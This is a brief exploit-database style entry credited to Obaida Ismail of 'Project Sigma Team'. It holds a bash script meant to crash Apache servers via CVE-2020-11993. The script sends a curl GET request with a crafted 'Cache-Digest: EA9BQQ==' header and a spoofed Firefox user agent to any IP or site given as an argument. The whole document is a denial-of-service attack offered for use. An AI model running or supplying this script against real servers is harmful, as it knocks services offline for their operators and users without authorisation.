# Exploit Title: Push Diary Crash on Specifically Crafted HTTP/2 Header (CVE-2020-11993)
# Exploit Author: Obaida Ismail
# Team: Project Sigma Team
# Telegram: https://t.me/ProjectSigmaTeam
# This is the exploit script , this script crash apache server
------------------------
#!/bin/bash
if [ $# -lt 1 ]
then
echo "Usage : bash $0 [ip or site]"
elif [ $# -gt 1 ]
then
echo "Usage : bash $0 [ip or site]"
else
curl -i -H "Cache-Digest: EA9BQQ==" -A "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:59.0) Gecko/20100101 Firefox/59.0" -X GET $1
fi
------------------------